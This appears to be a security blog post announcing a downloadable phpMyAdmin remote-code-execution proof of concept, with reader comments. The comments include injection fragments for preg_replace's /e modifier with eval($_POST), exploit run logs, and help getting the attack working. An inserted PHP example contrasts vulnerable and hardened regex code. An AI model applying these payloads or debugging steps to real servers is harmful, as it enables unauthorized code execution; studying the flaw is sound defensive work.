I'm flooded with requests for a POC, and many doubt that these vulnerabilities are exploitable. Since this vulnerability is rather technically interesting, I believe many could learn from it.
The POC uses the session manipulation vulnerability in combination with the remote code execution in preg_replace, as detailed in my last blog post. It will only confirm whether the instance is exploitable or not, and you need valid credentials for the database. Use responsibly.
Download here
Edit: As 0x6a616d6573 reminded me, Blogger removes "%00" if it is not carefully encoded. The code posted was messed up because of this (the downloadable file was still fine).
Now it's fixed. I also added the "//" as suggested.
Friday, July 8, 2011
It doesn't work. It shows me:
[i] Running...
[*] Contacting server to authenticate.
[i] Cookie:pma_mcrypt_iv=6usxi8fDjxY%3D; phpMyAdmin=83f941377c2ad368cb065ae3511c114b6ce908d7; pmaUser-1=K6%2BMQV0L8oo%3D; pmaPass-1=C7ohzD7vwAc%3D
[i] Token:e498413730bbb8c51ce127b807160bf8
[*] Contacting server to poison some _SESSION variables.
[*] Contacting server to execute command.
[!] Authentication error. Wrong password maby.
[*] Exiting...
I use PMA v3.4.3, PHP 5.3.5 on OS X.
@Anonymous
I'll debug tomorrow. It would be helpful if you edited the code, changed $debug to true and emailed me the output at h@xxor.se
@Mango: I appreciate the PoC, and I did learn something. I learned I should have spent more time trying to exploit this bug. lol :] Nice work!
Also, to get the PoC working reliably, I simply added a URI-encoded null byte at the end of the regex string, and a comment delimiter at the end of the injected PHP code (the null is not needed there, BTW):
'&_SESSION[src_uncommon_tables][0]=||/e'.
Becomes
'&_SESSION[src_uncommon_tables][0]=||/e%00'.
And
'\`.eval($_POST["comm"]);'."\x00" :
Becomes
'\`.eval($_POST["comm"]);//'."\x00" :
Apparently Blogger eats URL-encoded nulls for breakfast, but I think you know what I mean from the description.
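The bug class behind the "||/e" payload discussed in the comments above, as an added example that is not code from the original post, the PoC or phpMyAdmin: a hypothetical rewriteTableName routine that splices an attacker-controlled name (standing in for the poisoned $_SESSION entry) into the pattern argument of preg_replace(), beside a hardened version. The function names, the CREATE TABLE statement and all inputs are constructed for the example.

```php
<?php
// Added example, not phpMyAdmin's code and not the PoC from the post. It models
// untrusted data spliced into the *pattern* of preg_replace(). Function names,
// the SQL and the inputs are made up for the example.

// VULNERABLE: $tableName is attacker-controlled and lands raw inside the regex.
// Whoever controls that fragment decides where the pattern ends and which
// modifiers follow it. On PHP 5 an injected "e" modifier makes preg_replace()
// evaluate the replacement string as PHP code; PHP >= 7 removed /e entirely.
function rewriteTableNameVulnerable($createSql, $tableName, $newName)
{
    return preg_replace('/`' . $tableName . '`/', '`' . $newName . '`', $createSql);
}

// HARDENED: reject NUL bytes outright, escape every regex metacharacter
// (including the delimiter) with preg_quote(), and compute the replacement in a
// callback so neither /e nor "$1"-style tokens in $newName are ever interpreted.
function rewriteTableNameSafe($createSql, $tableName, $newName)
{
    if (strpos($tableName, "\0") !== false || strpos($newName, "\0") !== false) {
        throw new InvalidArgumentException('NUL byte in identifier');
    }
    $pattern = '/`' . preg_quote($tableName, '/') . '`/';
    $result = preg_replace_callback($pattern, function ($m) use ($newName) {
        return '`' . $newName . '`';
    }, $createSql);
    if ($result === null) {
        throw new RuntimeException('regex failed, preg_last_error=' . preg_last_error());
    }
    return $result;
}

// Constructed input for the example.
$createSql = 'CREATE TABLE `users` (`id` INT, `name` TEXT)';

// 1. Benign name: both versions do the intended job.
var_dump(rewriteTableNameVulnerable($createSql, 'users', 'users_copy'));
var_dump(rewriteTableNameSafe($createSql, 'users', 'users_copy'));
// both: CREATE TABLE `users_copy` (`id` INT, `name` TEXT)

// 2. Pattern injection that works on every PHP version: ".*" is greedy, so the
//    "table name" now spans from the first backtick to the last one and the
//    attacker rewrites the statement's structure, not just one identifier.
var_dump(rewriteTableNameVulnerable($createSql, '.*', 'x'));
// CREATE TABLE `x` TEXT)
var_dump(rewriteTableNameSafe($createSql, '.*', 'x'));
// unchanged: there is no literal ".*" table in the statement

// 3. The shape of the payload from the comments: "`||/e" closes the backtick,
//    adds an always-matching empty alternative, terminates the pattern with "/"
//    and leaves "e" (plus whatever the application appended) to be read as
//    modifiers. The resulting pattern string is "/``||/e`/".
$payload = '`||/e';
var_dump(@rewriteTableNameVulnerable($createSql, $payload, 'x'));
// PHP >= 7: NULL, with a warning (/e unsupported, or unknown modifier "`").
// PHP 5: "e" is accepted as the eval flag, but the trailing "`/" are unknown
// modifiers and preg_replace() still returns NULL. This is why the posted
// exploit cares about what follows "e" in the final regex: the replacement is
// only evaluated as code when the modifier list parses cleanly.
var_dump(rewriteTableNameSafe($createSql, $payload, 'x'));
// unchanged: preg_quote() turned the payload into the literal "`\|\|\/e"
```

Run it with any PHP from 5.3 on (php example.php). Only case 3 differs between versions; cases 1 and 2 show that the injection problem is the raw concatenation into the pattern, independent of /e, and that preg_quote() plus preg_replace_callback() closes both the modifier injection and the evaluated-replacement path at once.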
Just tested with version 3.3.9.2 (unsuccessful) and tried 0x6a616d6573's ['\`.eval($_POST["comm"]);//'."\x00" :]
Result of execution:
[i] Running...
[*] Contacting server to authenticate.
[!] Fail. request returned 401. The host is not vulnerable or there is a problem with the supplied url.
[*] Exiting...
-------------
Given that -u is set to https.
@Anon: Try echoing out the $result variable to see if that can give you some insight into how the 401 error is happening. Also, the null at the end of the PHP code isn't necessary. I don't know if that's the problem, but give it a go, and let us know how it works?
@Mango: Have you looked into the possibility of authentication bypass since $_SESSION variables can apparently be overwritten? I realize the authentication within phpMyAdmin happens on two different layers (application and SQL), but bypassing phpMyAdmin application-specific authentication should suffice for a preauth remote code execution condition. What do you think?
@0x6a616d6573
As I remember, the authentication can be bypassed without modifying the session. But I came to the conclusion that the code inevitably comes to some place where it needs a valid connection to the database before it hits any funny pieces of code.
But please, if you can find something, tell me. =D
Last Anon.
Debug = 1
http://www.pastie.org/private/66hsny5mrc8xw27dgsuitw
@Anonymous
Your server uses basic authentication. Use a URL like this:
https://user:pass@db.xxxxxxxxxx.com:443/phpmyadmin
I don't know if these credentials are the same as your db credentials.
Can you show me the LFI bug PoC?
Great work, man!
It took me a while to fully understand all this, but now it's clear! :)
Congrats on the hard work!
Download link does not work anymore :-(
Why doesn't it work? Can you help me?